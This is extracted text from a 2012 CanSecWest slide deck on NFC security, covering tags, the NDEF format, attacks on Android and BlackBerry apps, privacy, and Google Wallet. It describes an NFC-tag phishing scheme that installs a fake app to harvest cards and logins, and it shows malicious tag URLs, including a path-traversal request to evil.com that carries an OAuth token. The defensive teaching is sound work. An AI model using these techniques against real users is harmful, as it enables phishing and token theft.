Corey Benninger Max Sobell - CanSecWest 101 IG - 20120308 - CSW.pdfRecords, introduced in Android 4.0 (API level 14) for countermeasure AAR from Google: “If no application can start

Corey Benninger Max Sobell

NFC Overview

What is NFC?

Hardware basics behind NFC

Antennas and waveforms

Tags and access control

NFC Data Exchange Format (NDEF) NFC Application Attacks Privacy Mobile Wallets

2

RFID technology ISO 14443-1:4 (13.56 MHz)

▪ Physical characteristics

▪ Radio frequency power and signal interface

▪ Initialization and anti-collision

▪ Transmission protocol

No encryption or access control! Devices: Powered: PCD, interrogator, reader, device

Unpowered: PICC, target, tag, transponder 3

http://www.mockingweb.com/wp-content/uploads/2011/11/Near-field-communcation.png

4

RFID:

125 KHz/13.56 MHz/900 MHz

NFC (what we’ll be focusing on):

A type of RFID

Short range (induction v backscatter)

Enough

computational

power to perform

basic crypto

5

6

!=

Don’t think of NFC like “proximity cards” Can mimic these, but often NFC is much more

complex.

NFC enabled posters.

7

8

9

Phone Hardware

Radio (ISO 14443)

Phone OS Software

Protocol: APDU, SNEP

Data: NDEF

Market Applications

Foursquare, DoubleTwist, PayPal, Park Mobile, etc…

10

Replace a traditional antenna with coils of wire

11 Samsung Nexus S

Samsung Galaxy Nexus (in the battery)

Energy one way, data two ways

12

http://www.eurasip.org/Proceedings/Ext/RFID2007/pdf/s1p4.pdf

Inductive Coupling Current device ranges severely limited (4-10 cm)

Near Field: wavelength (~20m) much longer than antenna diameter

Kristen Paget: 900 MHz read ranges > 66 meters

That is not NFC

NFC theoretically limited to ~10m

13

Encoding: ASK

Reader -> Tag: Modified Miller @ 100% ASK

Tag -> Reader: Manchester @ 10% ASK

Baudrates:

106 kbps, 212 kbps,

424 kbps, 848 kbps

14

15

16

Tag: 10% ASK Reader: 100% ASK

Each Tag has a UID – unique identifier

Serial number for card

▪ Locked on physical tags

▪ but not on a $80 Chinese-manufactured knock-off card

Can be cloned using an emulated card

More than just memory sectors

Reader sends requests to read and write data from tag

Tag can deny request based on access controls

17

Mifare Tags

If you want access control, go with DESFire EV1 (for now)

18

"Breaking Mifare DESFire MF3ICD40: Power Analysis and Templates in the Real World" by David Oswald and Christof Paar

Tags Locked for

Writing Access Control

Broken Year

Broken

Ultralight 1 0 0

Classic 1 1 1 2008

DESFire 1 1 1 2011

DESFire EV1 1 1 0

Phone Hardware

Radio (ISO 14443)

Phone OS Software

Protocol: APDU, SNEP

Data: NDEF

Market Applications

Foursquare, DoubleTwist, PayPal, Park Mobile, etc…

19

NDEF – NFC Data Exchange Format

Specs come from NFC Forum

▪ www.nfc-forum.org

NDEF Message contains NDEF Record(s)

Common record types

▪ Text

▪ URI ▪ 0x00 through 0x23 to map bytes to prefixes.

▪ Smart Poster ▪ Text and URIs

20

21

Decimal Hex Protocol

0 0x00 N/A. No prepending

1 0x01 http://www.

2 0x02 https://www.

3 0x03 http://

4 0x04 https://

5 0x05 tel://

… … …

11 0x0B smb://

12 0x0c nfs://

13 0x0d ftp://

27 0x1B tcpobex://

36-255 0x23 – 0xFF RFU

Section 3.2.2 of NFCForum URI 1.0 spec

D1 01 0D 55 05 2B 31 35 35 35 31 32 33 34 35 36 37 FE

D1: record begin

01: length of payload length

▪ 0D: payload length

▪ 55: payload type (URI)

▪ 05: payload identifier (tel:// prefix)

▪ 2B->37: payload (“+15551234567”)

FE: terminal value character

22

Google Tags Application crash*

NDEF Stack built in to Android

23 * On Gingerbread. Java level parsing crash, not exploitable

Phone Hardware

Radio (ISO 14443)

Phone OS Software

Protocol: APDU, SNEP

Data: NDEF

Market Applications

Foursquare, DoubleTwist, PayPal, Park Mobile, etc…

24

Collin Mulliner – (www.mulliner.org)

Python code for working with Nokia 6313 NFC and Nokia 6212 Classic

Francois Kooman, Roel Verdult

Using NFC to trigger bluetooth and file transfers

Nick von Dadelszen - (www.lateralsecurity.com)

Kiwicon 2011 -Mobile point of sales reader w/ RFIDOIT

25

Messing with posters

Access control set?

Read-only option?

Physical protection?

26

27

Altering data Use write locking or access control

Zapping/DoS ???

“Counterfeit” tags NFC Signature Record Type

Definition Technical Specification ▪ Each record is signed ▪ Issues with Franken-tags, cloning,

signature-checking...

White-list of UIDs ▪ Mgmt pains

28

Countermeasures

Blackberry requires two clicks to open URL

29

Push for Zero Click NFC integration Some URIs require no user interaction

▪ Contacts, URLs, Market

“Beam” data from device to device

▪ Pass NDEF messages instead of emulating tags ▪ Simple NDEF Exchange Protocol (SNEP)

30

31

What if the user does not need to click, only tap?

http://developer.android.com/guide/topics/nfc/nfc.html#ndef

Register a detailed intent filter in the app’s AndroidManifest.xml

No interaction needed when scanning a URL with http://local.google.com/maps

What prevents a malicious application from also requesting this intent?

32

We can craft our own icon and title for our registered intent filter

Can you tell which is the real maps application?

33

NOTE: See Android Application Records, introduced in Android 4.0 (API level 14) for countermeasure

AAR from Google:

“If no application can start with the AAR, go to the Android Market to download the application based on the AAR.”

Set Android Application Record

Our application in the market

Add our own tag (Bigger! On the front!)

Successfully phished!

34

The tag:

NDEF URL Record: http://porkmobile.com

AAR: com.porkmobile

The app:

Webview to our server

Collect: credit cards, logins, etc…

Countermeasures: In Google’s market…

35

Developing an app accepting NDEF data?

Treat the NDEF data as untrusted. Validate like any user supplied data.

Example: Foursquare added NFC check-ins.

http://m.foursquare.com/checkin?venueID=27016678&venueName=Time%20Square%20New%20York

36

VenueID was not validated to match VenueName before check-in was submitted

Can’t trust tag data

37

•Fixed in version: 2011.08.11 – removed NFC check-in •Collin Mulliner @ NinjaCon 2011

Don’t blindly pass a URL (or data) from a tag What if… Intent filter “api.foursquare.com”

Your user is persistently logged in

Expect “http://api.foursquare.com/checkin?venueId=1”

But get

▪ http:// api.foursquare.com/account/addfriend?userId=666

▪ http:// api.foursquare.com/redirect?domain=www.evil.com ▪ Is your authentication token added to the URL?

38

ERROR/VenueActivity(536): java.lang.IllegalArgumentException: Illegal character in path at index 42: https://api.foursquare.com/v2/venues/1/..\..\..\..\www.evil.com?oauth_token=4CXOTLA50WHDKOJUGS4GQQ1XBINTPX5DSCFSRVARFH5YXE0O&v=20110525

39

“NFCShortcuts” app on Blackberry never writes to the tags

Triggers based of UID

Limits the attack surface

40

41

NFC as a privacy concern?

Smartphone has all the megabits anyway, right?

Can be as good as GPS data

Reading a UID at a specific time, may put you at a specific location

Transaction data at a Point of Sales could be sensitive (you spent how much where?)

Who your friends are (or what devices your friends have)

42

Reading an NFC tag generates an intent

seen in logcat, but not recorded to file system

Default “Tags” app

Stores tag and timestamp

/data/data/com.google.android.tag/databases/tags.db

43

Data can be left behind on tags from previous writes Make sure to zero out or

format used tag NDEF terminal value

character, length fields ▪ Have to read sector by

sector

44

45

How do you protect credit card info on your phone from…

other software listening for NFC tags?

“droid dream” like malware and other rooted applications?

a stolen device? 46

Yo Dawg, I heard you like computers

▪ Runs a base operating system

▪ Embedded applications

▪ Simple communication interface

▪ Strong crypto and access control ▪ Pre-shared key known to the SE “owner”

Even if your device is rooted, you won’t have full access to the SE

47 http://code.google.com/p/seek-for-android/

From the “NFC Antenna” Be within the

physical NFC range

From other apps Signed with

NFCR or RESE keys on BB

Signed by Google*

48

http://supportforums.blackberry.com/t5/tkb/articleprintpage/tkb-id/java_dev@tkb/article-id/623

* Unless rooted device or 3rd party SE

APDU - Application Protocol Data Unit (ISO7816-4)

Defines the communication between OS applications to applets in the Secure Element

BH08 - Ivan Buetler “SmartCard APDU Analysis”

Google Wallet Example send: 00 A4 04 00 00

▪ 5 bytes (SELECT [default CardManager])

recv: 6F 65 84 08 A0 00 00 00 03 00 00 00 ... 90 00 ▪ “90 00” - OK

49

Free $10 for contactless payments

Early build - lots of debug code

▪ BS Bank

▪ <- Debug Menu

ViaForensics post stored data

Can work on a NS 4G or NS or Galaxy Nexus (thanks XDA!)

▪ Non-root builds means signed by Google

50

http://intrepidusgroup.com/insight/2011/09/ a-brave-new-wallet-first-look-at-decompiling-google-wallet/

Zvelo team disclosed Google Wallet PIN is not stored in the secure element Physical access of the device needed for abuse On a rooted device

▪ The PIN can be brute forced (10,000 possibilities < 5 sec)

51 https://zvelo.com/blog/entry/google-wallet-security-pin-exposure-vulnerability

Don’t trust your user-land application

Keep payment secrets in the secure element

Keep lockout counts in the secure element

Do sensitive operations in the secure element

▪ Pin verification

Treat the bus to the secure element as insecure

“Hidden” APDUs will be found

▪ By monitoring or fuzzing

52

What about a “Tap” attack with a compromised point of sales reader? Pablos Holman’s

boingboing type “use the reader” hack

53

http://tv.boingboing.net/2008/03/19/how-to-hack-an-rfide.html

For Android: The NFC antenna in your phone is only activated when the

screen is powered on*

54

* For Google Nexus devices, although some NFC chips may work in “low power” or “no power” modes.

Blackberry w/ NFC: The default is to ALLOW card emulation when LOCKED or POWERED OFF! *

55

* The BB Device does not appear to “read” or take actions on tags in locked or powered off modes

Holman’s tap works to grab your own Google Wallet number… if your device is on, unlocked, passcode entered, and before it times out

ie: good countermeasures against IRL attacks

56

57

Positives

Can disable the radio

▪ (can’t turn off physical cards)

GPS to find my credit card

Easier to see transaction history

▪ Or current balances

Gives you more security control than physical cards

▪ Device passcode

NFC: it can be another vector to mobile devices and apps

Developers beware! Untrusted data!

Pen-Testers: It’s just getting started…

Questions?

58

Thank you to: Jason Ross @ IG, Collin @ www.mulliner.org, RFnoID @ Stevens

Our Blog http://www.intrepidusgroup.com/insight

@0xbenn @msobell